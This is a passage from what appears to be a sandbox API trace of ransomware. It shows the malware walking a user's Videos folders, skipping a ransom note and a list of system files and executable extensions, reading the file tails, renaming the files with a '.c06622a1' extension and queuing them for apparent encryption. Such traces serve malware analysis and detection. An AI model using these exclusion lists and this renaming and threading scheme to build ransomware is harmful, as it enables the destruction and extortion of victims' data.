Buffer=0x41f0094, Length=0x80) returned 0x8561375e [0156.943] RtlComputeCrc32 (PartialCrc=0x375e, Buffer=0x41f0094, Length=0x80) returned 0x9cd21404 [0156.943] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0156.943] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0156.943] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.943] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e70b780, ftCreationTime.dwHighDateTime=0x1d5da77, ftLastAccessTime.dwLowDateTime=0x54b1bf70, ftLastAccessTime.dwHighDateTime=0x1d5e3d2, ftLastWriteTime.dwLowDateTime=0x54b1bf70, ftLastWriteTime.dwHighDateTime=0x1d5e3d2, nFileSizeHigh=0x0, nFileSizeLow=0x15080, dwReserved0=0x0, dwReserved1=0x0, cFileName="V5_5Z8.avi", cAlternateFileName="")) returned 1 [0156.943] _wcsicmp (_Str1="V5_5Z8.avi", _Str2="README.c06622a1.TXT") returned 4 [0156.943] wcsstr (_Str="V5_5Z8.avi", _SubStr="README") returned 0x0 [0156.943] _wcsicmp (_Str1="autorun.inf", _Str2="V5_5Z8.avi") returned -21 [0156.943] wcslen (_String="autorun.inf") returned 0xb [0156.943] _wcsicmp (_Str1="boot.ini", _Str2="V5_5Z8.avi") returned -20 [0156.943] wcslen (_String="boot.ini") returned 0x8 [0156.943] _wcsicmp (_Str1="bootfont.bin", _Str2="V5_5Z8.avi") returned -20 [0156.943] wcslen (_String="bootfont.bin") returned 0xc [0156.943] _wcsicmp (_Str1="bootsect.bak", _Str2="V5_5Z8.avi") returned -20 [0156.943] wcslen (_String="bootsect.bak") returned 0xc [0156.943] _wcsicmp (_Str1="desktop.ini", _Str2="V5_5Z8.avi") returned -18 [0156.943] wcslen (_String="desktop.ini") returned 0xb [0156.943] _wcsicmp (_Str1="iconcache.db", _Str2="V5_5Z8.avi") returned -13 [0156.943] wcslen (_String="iconcache.db") returned 0xc [0156.943] _wcsicmp (_Str1="ntldr", _Str2="V5_5Z8.avi") returned -8 [0156.943] wcslen (_String="ntldr") returned 0x5 [0156.943] _wcsicmp (_Str1="ntuser.dat", _Str2="V5_5Z8.avi") returned -8 [0156.943] wcslen (_String="ntuser.dat") returned 0xa [0156.943] _wcsicmp (_Str1="ntuser.dat.log", _Str2="V5_5Z8.avi") returned -8 [0156.943] wcslen (_String="ntuser.dat.log") returned 0xe [0156.943] _wcsicmp (_Str1="ntuser.ini", _Str2="V5_5Z8.avi") returned -8 [0156.943] wcslen (_String="ntuser.ini") returned 0xa [0156.943] _wcsicmp (_Str1="thumbs.db", _Str2="V5_5Z8.avi") returned -2 [0156.943] wcslen (_String="thumbs.db") returned 0x9 [0156.943] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.943] wcslen (_String="386") returned 0x3 [0156.943] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.943] wcslen (_String="adv") returned 0x3 [0156.944] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.944] wcslen (_String="ani") returned 0x3 [0156.944] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.944] wcslen (_String="bat") returned 0x3 [0156.944] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.944] wcslen (_String="bin") returned 0x3 [0156.944] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.944] wcslen (_String="cab") returned 0x3 [0156.944] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.944] wcslen (_String="cmd") returned 0x3 [0156.944] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.944] wcslen (_String="com") returned 0x3 [0156.944] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.944] wcslen (_String="cpl") returned 0x3 [0156.944] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.944] wcslen (_String="cur") returned 0x3 [0156.944] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.944] wcslen (_String="deskthemepack") returned 0xd [0156.944] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.944] wcslen (_String="diagcab") returned 0x7 [0156.944] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.944] wcslen (_String="diagcfg") returned 0x7 [0156.944] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.944] wcslen (_String="diagpkg") returned 0x7 [0156.944] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.944] wcslen (_String="dll") returned 0x3 [0156.944] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.944] wcslen (_String="drv") returned 0x3 [0156.944] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.944] wcslen (_String="exe") returned 0x3 [0156.944] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.944] wcslen (_String="hlp") returned 0x3 [0156.944] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.944] wcslen (_String="icl") returned 0x3 [0156.944] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.944] wcslen (_String="icns") returned 0x4 [0156.944] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.944] wcslen (_String="ico") returned 0x3 [0156.945] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.945] wcslen (_String="ics") returned 0x3 [0156.945] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.945] wcslen (_String="idx") returned 0x3 [0156.945] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.945] wcslen (_String="ldf") returned 0x3 [0156.945] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.945] wcslen (_String="lnk") returned 0x3 [0156.945] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.945] wcslen (_String="mod") returned 0x3 [0156.945] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.945] wcslen (_String="mpa") returned 0x3 [0156.945] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.945] wcslen (_String="msc") returned 0x3 [0156.945] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.945] wcslen (_String="msp") returned 0x3 [0156.945] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.945] wcslen (_String="msstyles") returned 0x8 [0156.945] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.945] wcslen (_String="msu") returned 0x3 [0156.945] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.945] wcslen (_String="nls") returned 0x3 [0156.945] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.945] wcslen (_String="nomedia") returned 0x7 [0156.945] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.945] wcslen (_String="ocx") returned 0x3 [0156.945] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.945] wcslen (_String="prf") returned 0x3 [0156.945] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.945] wcslen (_String="ps1") returned 0x3 [0156.945] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.945] wcslen (_String="rom") returned 0x3 [0156.945] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.945] wcslen (_String="rtp") returned 0x3 [0156.945] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.945] wcslen (_String="scr") returned 0x3 [0156.945] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.945] wcslen (_String="shs") returned 0x3 [0156.945] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.946] wcslen (_String="spl") returned 0x3 [0156.946] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.946] wcslen (_String="sys") returned 0x3 [0156.946] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.946] wcslen (_String="theme") returned 0x5 [0156.946] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.946] wcslen (_String="themepack") returned 0x9 [0156.946] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.946] wcslen (_String="wpx") returned 0x3 [0156.946] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.946] wcslen (_String="lock") returned 0x4 [0156.946] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.946] wcslen (_String="key") returned 0x3 [0156.946] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.946] wcslen (_String="hta") returned 0x3 [0156.946] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.946] wcslen (_String="msi") returned 0x3 [0156.946] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.946] wcslen (_String="pdb") returned 0x3 [0156.946] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.946] wcslen (_String="sql") returned 0x3 [0156.946] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.946] wcslen (_String="sqlite") returned 0x6 [0156.946] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai")) returned 0x10 [0156.946] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0156.946] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" [0156.946] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned 0x3c [0156.946] wcscpy (in: _Dest=0x450010a, _Source="V5_5Z8.avi" | out: _Dest="V5_5Z8.avi") returned="V5_5Z8.avi" [0156.946] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi", dwFileAttributes=0x80) returned 1 [0156.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\v5_5z8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0156.947] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.947] ReadFile (in: hFile=0x2e0, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0156.948] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xf0fddeb7 [0156.948] RtlComputeCrc32 (PartialCrc=0xdeb7, Buffer=0x3fe8f4, Length=0x80) returned 0x4a328a79 [0156.948] RtlComputeCrc32 (PartialCrc=0x8a79, Buffer=0x3fe8f4, Length=0x80) returned 0x6a487841 [0156.948] RtlComputeCrc32 (PartialCrc=0x7841, Buffer=0x3fe8f4, Length=0x80) returned 0x7a726a47 [0156.948] RtlComputeCrc32 (PartialCrc=0x6a47, Buffer=0x3fe8f4, Length=0x80) returned 0x29883a86 [0156.948] CloseHandle (hObject=0x2e0) returned 1 [0156.948] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0156.948] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi" [0156.948] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi") returned 0x47 [0156.948] wcscpy (in: _Dest=0x4510126, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.948] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\v5_5z8.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\v5_5z8.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\V5_5Z8.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\v5_5z8.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x2e0 [0156.950] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.950] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4cafabd7 [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28578555 [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78cb95a8 [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6f14ef6e [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c7ded8f [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x285de8 [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c05a774 [0156.955] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x290b2466 [0156.958] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xf617f75e [0156.958] RtlComputeCrc32 (PartialCrc=0xf75e, Buffer=0x4280094, Length=0x80) returned 0x3a65cd33 [0156.958] RtlComputeCrc32 (PartialCrc=0xcd33, Buffer=0x4280094, Length=0x80) returned 0xe32add83 [0156.958] RtlComputeCrc32 (PartialCrc=0xdd83, Buffer=0x4280094, Length=0x80) returned 0xa9652aa1 [0156.958] RtlComputeCrc32 (PartialCrc=0x2aa1, Buffer=0x4280094, Length=0x80) returned 0xe862a2bc [0156.958] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0156.958] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0156.958] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.958] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.959] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0156.959] _wcsicmp (_Str1="backup", _Str2="P2SDJqjsKJSaPnHQeAI") returned -14 [0156.959] wcslen (_String="backup") returned 0x6 [0156.959] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.959] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.959] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b448c0, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0x9bfc7d00, ftLastAccessTime.dwHighDateTime=0x1d5d934, ftLastWriteTime.dwLowDateTime=0x9bfc7d00, ftLastWriteTime.dwHighDateTime=0x1d5d934, nFileSizeHigh=0x0, nFileSizeLow=0xa9f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZSkkB.swf", cAlternateFileName="")) returned 1 [0156.959] _wcsicmp (_Str1="PZSkkB.swf", _Str2="README.c06622a1.TXT") returned -2 [0156.959] wcsstr (_Str="PZSkkB.swf", _SubStr="README") returned 0x0 [0156.959] _wcsicmp (_Str1="autorun.inf", _Str2="PZSkkB.swf") returned -15 [0156.959] wcslen (_String="autorun.inf") returned 0xb [0156.959] _wcsicmp (_Str1="boot.ini", _Str2="PZSkkB.swf") returned -14 [0156.959] wcslen (_String="boot.ini") returned 0x8 [0156.959] _wcsicmp (_Str1="bootfont.bin", _Str2="PZSkkB.swf") returned -14 [0156.959] wcslen (_String="bootfont.bin") returned 0xc [0156.959] _wcsicmp (_Str1="bootsect.bak", _Str2="PZSkkB.swf") returned -14 [0156.959] wcslen (_String="bootsect.bak") returned 0xc [0156.959] _wcsicmp (_Str1="desktop.ini", _Str2="PZSkkB.swf") returned -12 [0156.959] wcslen (_String="desktop.ini") returned 0xb [0156.959] _wcsicmp (_Str1="iconcache.db", _Str2="PZSkkB.swf") returned -7 [0156.959] wcslen (_String="iconcache.db") returned 0xc [0156.959] _wcsicmp (_Str1="ntldr", _Str2="PZSkkB.swf") returned -2 [0156.959] wcslen (_String="ntldr") returned 0x5 [0156.959] _wcsicmp (_Str1="ntuser.dat", _Str2="PZSkkB.swf") returned -2 [0156.959] wcslen (_String="ntuser.dat") returned 0xa [0156.959] _wcsicmp (_Str1="ntuser.dat.log", _Str2="PZSkkB.swf") returned -2 [0156.959] wcslen (_String="ntuser.dat.log") returned 0xe [0156.959] _wcsicmp (_Str1="ntuser.ini", _Str2="PZSkkB.swf") returned -2 [0156.959] wcslen (_String="ntuser.ini") returned 0xa [0156.959] _wcsicmp (_Str1="thumbs.db", _Str2="PZSkkB.swf") returned 4 [0156.959] wcslen (_String="thumbs.db") returned 0x9 [0156.959] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.959] wcslen (_String="386") returned 0x3 [0156.960] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.960] wcslen (_String="adv") returned 0x3 [0156.960] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.960] wcslen (_String="ani") returned 0x3 [0156.960] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.960] wcslen (_String="bat") returned 0x3 [0156.960] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.960] wcslen (_String="bin") returned 0x3 [0156.960] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.960] wcslen (_String="cab") returned 0x3 [0156.960] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.960] wcslen (_String="cmd") returned 0x3 [0156.960] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.960] wcslen (_String="com") returned 0x3 [0156.960] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.960] wcslen (_String="cpl") returned 0x3 [0156.960] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.960] wcslen (_String="cur") returned 0x3 [0156.960] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.960] wcslen (_String="deskthemepack") returned 0xd [0156.960] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.960] wcslen (_String="diagcab") returned 0x7 [0156.960] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.960] wcslen (_String="diagcfg") returned 0x7 [0156.960] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.960] wcslen (_String="diagpkg") returned 0x7 [0156.960] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.960] wcslen (_String="dll") returned 0x3 [0156.960] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.960] wcslen (_String="drv") returned 0x3 [0156.960] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.960] wcslen (_String="exe") returned 0x3 [0156.960] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.960] wcslen (_String="hlp") returned 0x3 [0156.960] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.960] wcslen (_String="icl") returned 0x3 [0156.960] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.960] wcslen (_String="icns") returned 0x4 [0156.960] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.961] wcslen (_String="ico") returned 0x3 [0156.961] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.961] wcslen (_String="ics") returned 0x3 [0156.961] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.961] wcslen (_String="idx") returned 0x3 [0156.961] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.961] wcslen (_String="ldf") returned 0x3 [0156.961] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.961] wcslen (_String="lnk") returned 0x3 [0156.961] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.961] wcslen (_String="mod") returned 0x3 [0156.961] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.961] wcslen (_String="mpa") returned 0x3 [0156.961] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.961] wcslen (_String="msc") returned 0x3 [0156.961] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.961] wcslen (_String="msp") returned 0x3 [0156.961] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.961] wcslen (_String="msstyles") returned 0x8 [0156.961] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.961] wcslen (_String="msu") returned 0x3 [0156.961] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.961] wcslen (_String="nls") returned 0x3 [0156.961] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.961] wcslen (_String="nomedia") returned 0x7 [0156.961] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.961] wcslen (_String="ocx") returned 0x3 [0156.961] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.961] wcslen (_String="prf") returned 0x3 [0156.961] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.961] wcslen (_String="ps1") returned 0x3 [0156.961] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.961] wcslen (_String="rom") returned 0x3 [0156.961] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.961] wcslen (_String="rtp") returned 0x3 [0156.961] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.961] wcslen (_String="scr") returned 0x3 [0156.961] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.961] wcslen (_String="shs") returned 0x3 [0156.962] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.962] wcslen (_String="spl") returned 0x3 [0156.962] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.962] wcslen (_String="sys") returned 0x3 [0156.962] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.962] wcslen (_String="theme") returned 0x5 [0156.962] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.962] wcslen (_String="themepack") returned 0x9 [0156.962] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.962] wcslen (_String="wpx") returned 0x3 [0156.962] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.962] wcslen (_String="lock") returned 0x4 [0156.962] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.962] wcslen (_String="key") returned 0x3 [0156.962] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.962] wcslen (_String="hta") returned 0x3 [0156.962] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.962] wcslen (_String="msi") returned 0x3 [0156.962] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.962] wcslen (_String="pdb") returned 0x3 [0156.962] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0156.962] wcslen (_String="sql") returned 0x3 [0156.962] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.962] wcslen (_String="sqlite") returned 0x6 [0156.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0156.962] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0156.962] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0156.962] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0156.962] wcscpy (in: _Dest=0x44d00ca, _Source="PZSkkB.swf" | out: _Dest="PZSkkB.swf") returned="PZSkkB.swf" [0156.962] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf", dwFileAttributes=0x80) returned 1 [0156.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pzskkb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0156.963] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.963] ReadFile (in: hFile=0x1c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0156.964] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xb51c6129 [0156.964] RtlComputeCrc32 (PartialCrc=0x6129, Buffer=0x3feb74, Length=0x80) returned 0xa3bdcd29 [0156.964] RtlComputeCrc32 (PartialCrc=0xcd29, Buffer=0x3feb74, Length=0x80) returned 0xe3dc40f9 [0156.964] RtlComputeCrc32 (PartialCrc=0x40f9, Buffer=0x3feb74, Length=0x80) returned 0x1e0dab0 [0156.964] RtlComputeCrc32 (PartialCrc=0xdab0, Buffer=0x3feb74, Length=0x80) returned 0x64e55ddb [0156.964] CloseHandle (hObject=0x1c) returned 1 [0156.964] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0156.964] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf" [0156.964] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf") returned 0x33 [0156.964] wcscpy (in: _Dest=0x44e00e6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.964] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PZSkkB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pzskkb.swf"), 